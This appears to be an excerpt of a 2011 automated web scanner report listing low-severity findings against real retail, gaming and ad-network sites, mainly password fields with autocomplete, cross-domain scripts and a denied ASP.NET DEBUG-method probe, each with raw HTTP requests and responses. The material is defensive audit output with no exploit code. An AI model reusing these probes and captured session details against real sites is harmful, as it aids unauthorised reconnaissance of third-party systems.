HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Content-Type: text/html Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:41 GMT Set-Cookie: DCL_POOL=1;path=/; Set-Cookie: dcl_i_persistence=H Content-Length: 63930 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> ...[SNIP]... <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://localhost:50386 |
Path: | /hoyt/Sitefinity/Startup |
GET /hoyt/Sitefinity/Startup HTTP/1.1 Host: localhost:50386 Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Cassini/4.1.1395.0 Date: Mon, 16 May 2011 00:10:29 GMT X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 15543 Connection: Close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="Head1"><meta ht ...[SNIP]... <body onload="HideLoading()" onbeforeunload= <form method="post" action="Startup" onkeypress="javascript <div class="aspNetHidden"> ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... </label><input name="wizard$ctl00$ctl04 ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:43 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 108383 Cache-Control: public, max-age=19338 Expires: Mon, 16 May 2011 07:05:34 GMT Date: Mon, 16 May 2011 01:43:16 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... </div>'; //learn step 1 var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions ...[SNIP]... </label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:40 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 106125 Cache-Control: public, max-age=19577 Expires: Mon, 16 May 2011 07:05:43 GMT Date: Mon, 16 May 2011 01:39:26 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... </div>'; //learn step 1 var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions ...[SNIP]... </label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | /user/login.jsp |
GET /user/login.jsp HTTP/1.1 Host: www.fingerhut.com Connection: keep-alive Referer: http://www.fingerhut.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PIPELINE_SESSION_ID |
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=ISO Vary: Accept-Encoding Content-Length: 83965 Date: Mon, 16 May 2011 01:37:28 GMT Connection: keep-alive Set-Cookie: JSESSIONID=B5C80FAB7 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html > <head> <style type="text/css"> body { ...[SNIP]... <div id="systemPageContainer" class="loginPage"> <form id="loginForm" action="/user/login.cmd" method="post" name="loginForm"><input type='hidden' name='form_state' value='loginForm'/> ...[SNIP]... <div class="inputContainer" id="pwdContainer"> <input class="required" id="password" name="password" type="password" maxlength="15"/></div> ...[SNIP]... <div class="inputContainer"> <input class="required" id="passwordNewMember" name="passwordNewMember" type="password" maxlength="15"/></div> ...[SNIP]... <div class="inputContainer"> <input class="required" id="verifyPassword" name="verifyPassword" type="password" maxlength="15"/></div> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.passporte |
Path: | /forums/ |
GET /forums/ HTTP/1.1 Host: www.passporterboards.com Proxy-Connection: keep-alive Referer: http://www.passporte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: bbsessionhash=cf5022 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:31:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 Set-Cookie: bblastvisit=1305508789; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Set-Cookie: bblastactivity=0; expires=Tue, 15-May-2012 01:31:56 GMT; path=/; domain=.passporterboards Cache-Control: private Pragma: private Content-Type: text/html; charset=ISO-8859-1 X-UA-Compatible: IE=7 Set-Cookie: vbseo_loggedin=deleted; expires=Sun, 16-May-2010 01:31:55 GMT; path=/ Content-Length: 162646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR ...[SNIP]... <td class="alt2" nowrap="nowrap" style="padding:0px"> <form action="http://www ...[SNIP]... <td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87984 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87984 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:24:04 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... <div class="formSections" id="loginFormSection"> <form action="https://www <input type="hidden" name="reLogonURL" value="LogonForm"/> ...[SNIP]... </label> <input type="password" maxlength="25" name="loginLogonPassword" id="loginLogonPassword" class="text validate-password" caption="8-25 letters and numbers"/> </li> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87984 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87984 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:24:04 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... <div id="registrationForm <form action="SYUserRegist <h3 class="formPageHeader"> ...[SNIP]... </label> <input type="password" maxlength="25" value="" id="logonPassword" name="logonPassword" caption="8-25 letters and numbers" class="text validate-password " /> </li> ...[SNIP]... </label> <input type="password" maxlength="25" value="" id="logonPasswordVerify" name="logonPasswordVerify class="text validate-passwordconfirm " /> </li> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.viddler.com |
Path: | /file/7d63c65a/html5 |
GET /file/7d63c65a/html5 Host: www.viddler.com Proxy-Connection: keep-alive Referer: http://blog.us.plays Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Range: bytes=0- |
HTTP/1.1 500 Internal Server Error Server: nginx/0.6.32 Date: Sun, 15 May 2011 20:26:39 GMT Content-Type: text/html;charset=UTF-8 Connection: keep-alive X-Viddler-Node: viddler_d Vary: Accept-Encoding Content-Length: 7614 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; c ...[SNIP]... </a> <form action="/j_security_check <input type="text" name="j_username" id="login-username" size="10" class="dim"/> ...[SNIP]... <input type="text" class="dim" value="password" id="login-password-show"/ <a id="headerLoginSubmit" class="headerButton" href="#"> ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://usata1.gcion.com |
Path: | /Default.aspx |
DEBUG /Default.aspx HTTP/1.0 Host: usata1.gcion.com Command: start-debug |
HTTP/1.1 401 Unauthorized Connection: keep-alive Date: Mon, 16 May 2011 01:26:46 GMT Server: Microsoft-IIS/6.0 WWW-Authenticate: Basic realm="usata1.gcion.com" X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 39 Debug access denied to '/Default.aspx'. |
Severity: | Information |
Confidence: | Firm |
Host: | http://a.tribalfusion.com |
Path: | /j.ad |
GET /j.ad?site=targus&adSpace Host: a.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://cdn5.tribalfusion Cookie: ANON_ID=aqnu7qmMZaEv |
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 303 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidate Set-Cookie: ANON_ID=aInvQwqkaHOn Content-Type: application/x-javascript Content-Encoding: Content-Length: 0 Expires: 0 Connection: keep-alive |
GET /j.ad?site=targus&adSpace Host: a.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: ANON_ID=aqnu7qmMZaEv |
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 303 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidate Content-Type: application/x-javascript Content-Encoding: Content-Length: 0 Expires: 0 Connection: keep-alive |
Severity: | Information |
Confidence: | Firm |
Host: | http://ad.yieldmanager |
Path: | /imp |
GET /imp?Z=728x90&s=1565884& Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=uid=c0ff5dec-7e12 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:25:17 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" X-RightMedia-Hostname: raptor0017.rm.bf1 Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0 Cache-Control: no-store Last-Modified: Mon, 16 May 2011 01:25:17 GMT Pragma: no-cache Content-Length: 864 Content-Type: application/x-javascript Age: 0 Proxy-Connection: close document.write('<iframe allowtransparency=\"true\ var rm_data = new Object(); rm_data.creative_id = 8974609; rm_data.offer_type = 20; rm_data.entity_id = 428208; if (window.rm_crex_data) {rm_crex_data.push |
GET /imp?Z=728x90&s=1565884& Host: ad.yieldmanager.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=uid=c0ff5dec-7e12 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:25:36 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" X-RightMedia-Hostname: raptor0320.rm.bf1 Set-Cookie: ih="b!!!!$!1mH9!!!!#=!i98 Set-Cookie: vuday1=!!!!#%)0sHNDf0( Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0 Set-Cookie: liday1=>r[i<NDf0(+[pFB; path=/; expires=Tue, 17-May-2011 00:00:00 GMT Cache-Control: no-store Last-Modified: Mon, 16 May 2011 01:25:36 GMT Pragma: no-cache Content-Length: 836 Content-Type: application/x-javascript Age: 0 Proxy-Connection: close document.write('<a target=\"_blank\" href=\"http://ads var rm_data = new Object(); rm_data.creative_id = 9371106; rm_data.offer_type = 19; rm_data.entity_id = 336829; if (window.rm_crex_data) {rm_crex_data.push |
Severity: | Information |
Confidence: | Firm |
Host: | http://login.dotomi.com |
Path: | /ucm/UCMController |
GET /ucm/UCMController?dtm Host: login.dotomi.com Proxy-Connection: keep-alive Referer: http://www.fingerhut.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:38:30 GMT X-Name: dmc-o01 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Content-Type: text/html Content-Length: 191 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html </head> <body> </body> </html> |
GET /ucm/UCMController?dtm Host: login.dotomi.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: Apache=173.193.214.243 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:38:34 GMT X-Name: dmc-o01 Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache, private P3P: "policyref="/w3c/p3p.xml" Set-Cookie: DotomiUser=330100732 Set-Cookie: DotomiSession_2296=2 Set-Cookie: DotomiNet=2$DjQqblZ1 Set-Cookie: DotomiRR2296=-1$1$1$; Domain=.dotomi.com; Expires=Tue, 17-May-2011 01:38:34 GMT; Path=/ Content-Type: text/html Content-Length: 1577 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html </head> <body> <script language="JavaScript" type="text/javascript" charset="UTF-8"> var cgver = ("18728" != "" ? parseInt("18728") : -1); var rccg = ("42" != "" ? parseInt("42") : 0); var dmcg = ("" != "" ? parseInt("") : 0); var dnc = ("" == "1" ? 1 : 0); var secure = false; var imps = ("300" != "" ? parseInt("300") : 1000); var utoken = "WH9qYld2QnJADW1dBwV if((cgver >= 0) && (!dnc) && ((dmcg > 0) || ((rccg > 0) && (imps > 0)))){ var akurl = ""; if (secure){ akurl = "https://a248.e.akamai } else { akurl = "http://cache.dtmpub.com akurl = akurl.replace("optin_", "optinrt_"); } document.write('<scr'+ } document.write(''); if((true) && (("true" != "" ? true : 0)) && (("1" == "1" ? 1 : 0))){ document.write('<img src="/ucm/D ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | http://us.playstation.com |
Path: | /uwps/UsplaystationBlogs |
GET /uwps/UsplaystationBlogs Host: us.playstation.com Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E81B82 |
HTTP/1.1 200 OK Date: Sun, 15 May 2011 20:30:07 GMT Server: Apache X-Powered-By: Servlet/2.5 JSP/2.1 Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 3356 <div class="grid"><div class="gridInner"><div class="item"><div class="itemInner"><div class="top"><h4 class="fixHeight">Play On ... PSN Restoration...</h4><p ...[SNIP]... |
GET /uwps/UsplaystationBlogs Host: us.playstation.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: s_vi=[CS]v1|26E81B82 |
HTTP/1.1 404 Not Found Date: Sun, 15 May 2011 20:30:24 GMT Server: Apache Cteonnt-Length: 703 Content-Type: text/html; charset=ISO-8859-1 Cache-Control: private Content-Length: 703 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body> <!-- It Appears that the page you were looking for does not exist. Here are some pointers to get you back on track: * Check the URL for typos o Link 1 o Link 1 o Link 1 * Search us.playstation.com Our popular sections: PlayStation.3 PSP.system PlayStation.Network Games and Media Forums Blogs --> <script type="text/javascript"> window.location.href = 'http://us.playstation </script> </body> </html> |
Severity: | Information |
Confidence: | Firm |
Host: | http://www.facebook.com |
Path: | /plugins/like.php |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive Referer: http://blog.us.plays User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.24.45 X-Cnection: close Date: Sun, 15 May 2011 20:27:08 GMT Content-Length: 9358 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="connect_widget_4dd0371c0a0dd5807236342" class="connect_widget button_count" style=""><table class="connect_widget Env={module:"like_widget" </script> <script type="text/javascript" ...[SNIP]... |
GET /plugins/like.php?action Host: www.facebook.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: datr=3GHNTeTln1shCRl |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.78.26 X-Cnection: close Date: Sun, 15 May 2011 20:27:30 GMT Content-Length: 9326 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="connect_widget_4dd03732a530f4916888972" class="connect_widget button_count" style=""><table class="connect_widget Env={module:"like_widget" </script> <script type="text/javascript" ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.sonystyle.com |
Path: | /webapp/wcs/stores |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Referer: https://www.sonystyle.com Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87984 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 87984 Vary: Accept-Encoding Date: Sun, 15 May 2011 21:24:04 GMT Connection: keep-alive Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... <input type="hidden" value="https://www.sonystyle.com </form> </div> <div id="registrationForm <form action="SYUserRegist <h3 class="formPageHeader"> Register </h3> <ul class="formPageEntryList" <fieldset id="basicInformation" class="boxFields"> <li class="formPageEntryItem" <label class="label" for="logonId"> E-mail Address: </label> <input type="text" maxlength="254" value="" name="logonId" id="logonId" class="text validate-email-custom" caption="(this is your username for future access)"/> </li> <li class="formPageEntryItem" <label class="label" for="logonId"> New Password: </label> <input type="password" maxlength="25" value="" id="logonPassword" name="logonPassword" caption="8-25 letters and numbers" class="text validate-password " /> </li> <li class="formPageEntryItem" <label class="label" for="logonId"> Confirm Password: </label> <input type="password" maxlength="25" value="" id="logonPasswordVerify" name="logonPasswordVerify class="text validate-passwordconfirm " /> </li> <li class="formPageEntryItem" <input type="checkbox" class="checkbox" value="true" name="rememberMe" id="rememberMe"/> <label class="label checkbox rememberMe" for="rememberMe">Remember me on this computer</label> <a href="#whatsThisPopUp" class="infoLinks lightwindow page-options"> What's this? </a> </li> <li class="formPageEntryItem" <input type="checkbox" class="checkbox" name="newsletter" id="newsletter" value="10171" checked /> <label class="label checkbox emailOptIn" for="newsletter"> Keep me informed about Sony special offers, exclusive products and new product information. </label> </li> <li class="formPageEntryItem" <label class="label" for="submitButton">< <a class="createButton seoImage" id="submitButton" href="#">Submit </a> </li> <li class="formPageEntryItem" ...[SNIP]... |
GET /webapp/wcs/stores Host: www.sonystyle.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Connection: keep-alive Cookie: TS5bbf46=f5a3eb9e27e |
HTTP/1.1 200 OK ntCoent-Length: 87734 Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Date: Sun, 15 May 2011 21:25:38 GMT Content-Length: 87734 Connection: keep-alive Vary: Accept-Encoding Cache-Control: private Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: No-cache <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html> <head> <!-- AllSitesHeadInclude --> <script type="text/javascript" src="//nexus2.e ...[SNIP]... <input type="hidden" value="" name="redirectURL"/> </form> </div> <div id="registrationForm <form action="SYUserRegist <h3 class="formPageHeader"> Register </h3> <ul class="formPageEntryList" <fieldset id="basicInformation" class="boxFields"> <li class="formPageEntryItem" <label class="label" for="logonId"> E-mail Address: </label> <input type="text" maxlength="254" value="" name="logonId" id="logonId" class="text validate-email-custom" caption="(this is your username for future access)"/> </li> <li class="formPageEntryItem" <label class="label" for="logonId"> New Password: </label> <input type="password" maxlength="25" value="" id="logonPassword" name="logonPassword" caption="8-25 letters and numbers" class="text validate-password " /> </li> <li class="formPageEntryItem" <label class="label" for="logonId"> Confirm Password: </label> <input type="password" maxlength="25" value="" id="logonPasswordVerify" name="logonPasswordVerify class="text validate-passwordconfirm " /> </li> <li class="formPageEntryItem" <input type="checkbox" class="checkbox" value="true" name="rememberMe" id="rememberMe"/> <label class="label checkbox rememberMe" for="rememberMe">Remember me on this computer</label> <a href="#whatsThisPopUp" class="infoLinks lightwindow page-options"> What's this? </a> </li> <li class="formPageEntryItem" <input type="checkbox" class="checkbox" name="newsletter" id="newsletter" value="10171" checked /> <label class="label checkbox emailOptIn" for="newsletter"> Keep me informed about Sony special offers, exclusive products and new product information. </label> </li> <li class="formPageEntryItem" <label class="label" for="submitButton">< <a class="createButton seoImage" id="submitButton" href="#">Submit </a> </li> <li class="formPageEntryItem" <label class="label"></label> <a href="http://products.sel ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://blog.us.plays |
Path: | / |
GET / HTTP/1.1 Host: blog.us.playstation.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: mbox=check#true |
HTTP/1.1 200 OK Server: nginx Date: Sun, 15 May 2011 20:26:34 GMT Content-Type: text/html; charset=UTF-8 Cneonction: close Vary: Cookie Last-Modified: Sun, 15 May 2011 20:21:54 +0000 Cache-Control: max-age=20, must-revalidate X-Pingback: http://blog.us.plays X-hax0r: sean at voce connect Content-Length: 71106 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="email-form"> <form action="http://www <h2> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://blog.us.plays |
Path: | /2011/04/26/update-on |
GET /2011/04/26/update-on Host: blog.us.playstation.com Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: APPLICATION_SITE_URL=http |
